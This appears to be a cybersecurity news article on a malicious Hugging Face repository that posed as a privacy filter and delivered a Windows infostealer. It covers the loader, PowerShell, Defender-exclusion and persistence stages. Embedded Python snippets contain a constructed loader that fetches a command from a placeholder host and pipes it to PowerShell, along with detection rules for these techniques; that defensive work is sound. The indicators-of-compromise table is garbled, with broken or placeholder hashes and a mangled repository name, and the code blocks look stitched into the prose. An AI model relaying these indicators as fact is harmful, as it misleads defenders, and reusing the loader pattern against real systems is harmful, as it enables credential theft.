Hugging Face Repo with 200k Downloads Inst Trending Repository

Sarah simpson
May 11, 2026

A trending artificial intelligence repository on Hugging Face, boasting over 200,000 downloads, was recently discovered to be distributing dangerous malware. This malicious code specifically targets Windows users, a concerning development detailed in a new analysis.

The repository, named “Open-OSS/privacy-filter,” had racked up over 200,000 downloads before the platform’s team stepped in and removed it.

The malicious package disguised itself as a legitimate privacy filtering tool. It copied its model card nearly verbatim from OpenAI’s own Privacy Filter project, giving it a convincing, trustworthy appearance.

Thousands of developers and researchers downloaded it without any suspicion, thinking they were working with a well-regarded and reliable AI utility.

Researchers at Hidden Layer identified the malicious code buried deep inside the repository. Their analysis revealed a sophisticated, multi-stage attack chain carefully designed to steal sensitive data from Windows machines and stay hidden throughout the entire process.

The attack did not announce itself in any way. Instead, it quietly executed in the background, using a loader file that mimicked the look and behavior of a legitimate AI model tool. Once a user ran it on a Windows machine, the real damage began without any visible warning signs.

The reach of this campaign was not accidental. Before access to the repository was disabled, it had already climbed to the number one trending position on Hugging Face, with approximately 244 downloads and 77 likes in under one hour. Those numbers were almost certainly inflated artificially to push the repository into the spotlight and attract more victims.

Trending Hugging Face Repository Executes Malware

The attack chain unfolded across six distinct stages. In the first stage, the model card instructed users to clone the repository and run a start.bat file on Windows, or a Python loader.py script on Linux or macOS.

When executed on Windows, the loader.py script ran a decoy piece of code that looked like a real loader, then called a function named verifychecksumintegrity, which disabled SSL verification, decoded a base64-encoded URL pointing to jsonkeeper.com, fetched a JSON document, and extracted the cmd field. That command was passed directly to PowerShell, running silently with execution policy bypassed.

The second stage involved PowerShell downloading a batch file called update.bat from a domain mimicking a blockchain analytics service, api.eth-fastscan.org. The batch file performed six core actions, including admin checks, payload downloads, and adding Microsoft Defender exclusions for the directories where the malicious executable was dropped.

A scheduled task named MicrosoftEdgeUpdateTaskCore was also created to maintain persistence, though it was designed as a one-shot launcher that deleted itself after running, leaving no obvious trace behind.
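The loader traits described in this section (TLS verification switched off, a URL hidden in a base64 literal, a command handed to PowerShell) can be checked for statically before any script from a cloned model repository is run. The following is an added example, not code from Hidden Layer or from the repository; it assumes the TLS bypass appears as `ssl._create_unverified_context()` or a `verify=False` keyword, and the sample loader, its placeholder URL and `fetch_json()` are constructed.

```python
import ast
import base64
import binascii
import re

# Constructed sample that mimics only the traits the article describes. It is
# parsed, never executed; the URL and fetch_json() are placeholders.
_B64_URL = base64.b64encode(b"https://paste.example.invalid/b/XXXX").decode()
SAMPLE_LOADER = f'''
import base64, ssl, subprocess
def verifychecksumintegrity():
    ctx = ssl._create_unverified_context()
    src = base64.b64decode("{_B64_URL}").decode()
    cmd = fetch_json(src, ctx)["cmd"]
    subprocess.Popen(["powershell", "-ExecutionPolicy", "Bypass", "-Command", cmd])
'''

def hides_url(text):
    """True if a string literal is valid base64 that decodes to an http(s) URL."""
    if not re.fullmatch(r"[A-Za-z0-9+/]{16,}={0,2}", text):
        return False
    try:
        raw = base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return False
    return re.fullmatch(rb"https?://[\x21-\x7e]+", raw) is not None

def triage(source):
    """Return sorted (line, finding) pairs for the loader traits described above."""
    found = set()
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = ast.unparse(node.func)  # e.g. "subprocess.Popen" (Python 3.9+)
        texts = [n.value for n in ast.walk(node)
                 if isinstance(n, ast.Constant) and isinstance(n.value, str)]
        no_verify = any(k.arg == "verify" and isinstance(k.value, ast.Constant)
                        and k.value.value is False for k in node.keywords)
        if name == "ssl._create_unverified_context" or no_verify:
            found.add((node.lineno, "TLS verification disabled"))
        if name.startswith(("subprocess.", "os.")) and any(
                "powershell" in t.lower() for t in texts):
            found.add((node.lineno, "PowerShell launched from Python"))
        if any(hides_url(t) for t in texts):
            found.add((node.lineno, "URL hidden in base64 literal"))
    return sorted(found)
```

Any one finding is common in legitimate code; all three in a file that claims to load a model is the combination worth stopping on.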

The Infostealer Payload and Credential Theft

The final payload was a 10 MB Rust-based infostealer with an impressive range of capabilities. It specifically targeted Windows API calls to defeat static analysis and ran checks to detect debuggers, sandboxes, and virtual machines, including VirtualBox, VMware, Hyper-V, and Parallels. If it detected those environments, it simply stopped running.

Once active on a real machine, it launched eight parallel collection modules that targeted Chrome and Firefox browser cookies, login data, saved passwords, session cookies, SSH keys, VPN configurations, FTP credentials, and cryptocurrency wallet files. Screenshots were also captured and packaged for exfiltration. All stolen data was compressed and sent to a command-and-control server at recargapopular.com using a POST request with a Bearer token authorization header.

Hidden Layer’s telemetry also linked the same attacker account to six other repositories uploaded on April 24, 2025, all containing nearly identical loader functionality. The shared infrastructure between those repositories and the Open-OSS/privacy-filter campaign strongly suggested this was part of a broader, coordinated supply chain operation targeting open-source AI ecosystems.

Anyone who downloaded or cloned Open-OSS/privacy-filter, or any of the related repositories listed in the IOCs table below, should treat the affected system as fully compromised.

Recommended actions include isolating the host immediately, rotating every credential stored in browsers, password managers, or credential stores on that machine, and revoking any cloud provider tokens or SSH keys that may have been present. Reimaging the host is strongly advised before returning it to production use.
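To find hosts that need the treatment above, the second-stage behaviours described earlier can be hunted in process-creation telemetry. This is an added example, not from Hidden Layer or this article: the event records are constructed, and the `Add-MpPreference` and `schtasks` command forms are assumptions, since the article names the behaviours but not the exact commands.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style fields);
# hosts, paths and command lines are invented to exercise the rules below.
EVENTS = [
    {"host": "ws-01", "parent": r"C:\Python311\python.exe", "image": "powershell.exe",
     "cmd": "powershell -NoProfile -ExecutionPolicy Bypass -Command <elided>"},
    {"host": "ws-01", "parent": "cmd.exe", "image": "powershell.exe",
     "cmd": r"powershell Add-MpPreference -ExclusionPath C:\Users\Public\cache"},
    {"host": "ws-01", "parent": "cmd.exe", "image": "schtasks.exe",
     "cmd": "schtasks /create /tn MicrosoftEdgeUpdateTaskCore /sc once <elided>"},
    {"host": "ws-02", "parent": "svchost.exe", "image": "schtasks.exe",
     "cmd": "schtasks /query /tn MicrosoftEdgeUpdateTaskMachineCore"},
    {"host": "ws-02", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell -ExecutionPolicy Bypass -File build.ps1"},
]

# Each rule is (name, predicate). Policy bypass alone is not flagged: it only
# counts when the parent process is a Python interpreter, as in stage one.
RULES = [
    ("policy-bypass PowerShell spawned by Python",
     lambda e: "python" in e["parent"].lower()
     and re.search(r"-(ex\w*|ep)\s+bypass", e["cmd"], re.I) is not None),
    ("Defender exclusion added",
     lambda e: re.search(r"(add|set)-mppreference\b.*-exclusion(path|process|extension)",
                         e["cmd"], re.I) is not None),
    ("scheduled task MicrosoftEdgeUpdateTaskCore created",
     lambda e: re.search(r'/create\b.*/tn\s+"?MicrosoftEdgeUpdateTaskCore\b',
                         e["cmd"], re.I) is not None),
]


def hunt(events):
    """Map each host to the sorted rule names that fired on its events."""
    hits = {}
    for event in events:
        for name, matches in RULES:
            if matches(event):
                hits.setdefault(event["host"], set()).add(name)
    return {host: sorted(names) for host, names in hits.items()}
```

Because the task is described as a one-shot launcher that deletes itself, the creation event in historical telemetry is the evidence to look for; the task may no longer exist on the host.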

Indicators of Compromise (IoCs):

| Type | Indicator | Description |
|---|---|---|
| Domain | api.eth-fastscan[.]org | Hosts update.bat second-stage downloader batch file |
| Domain | recargapopular[.]com | C2 exfiltration endpoint receiving stolen data via POST |
| Domain | jsonkeeper[.]com | Paste service used to host and rotate PowerShell payload |
| Domain | welovechinatown[.]info | C2 domain observed in a separate related sample |
| URL | https[://]api.eth-fastscan[.]org/update.bat | Direct URL delivering the second-stage batch file |
| File Hash (SHA256) | 3e7cb11}cx\|\| (loader.py) | SHA256 hash of the primary Python loader file |
| File Hash (SHA256) | 5e8ca2a7f4 (loader.py v2) | SHA256 hash of second loader variant with identical functionality |
| File Hash (SHA256) | start.bat hash | SHA256 of Windows batch launcher in the repository |
| File Hash (SHA256) | update.bat hash | SHA256 of the PowerShell-executed batch payload |
| File Hash (SHA256) | Infostealer C1 | SHA256 hash of the Rust-based infostealer payload |
| Hugging Face Repo | anthubBonsai/BonsaiLLM | Related malicious repository under same account |
| Hugging Face Repo | anthubWen/5BA/BAREPEWen/5}BA | Related malicious repository uploaded April 24, 2025 |
| Hugging Face Repo | anthubWen/ClaudeOpusReasoningDistilled | Related malicious repository under same attacker account |
| Hugging Face Repo | anthubWen/ClaudeOpusReasoningDistilled variant | Loader contained near-identical command retrieval URL |
| Scheduled Task | MicrosoftEdgeUpdateTaskCore | Persistence mechanism impersonating legitimate Edge updater |
| File Path | %TEMP%update.bat | Location where second-stage batch file is written and executed |
| File Path | %TEMP%runners1 / runnerps1 | Runner script dropping Defender exclusions and infostealer binary |

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.
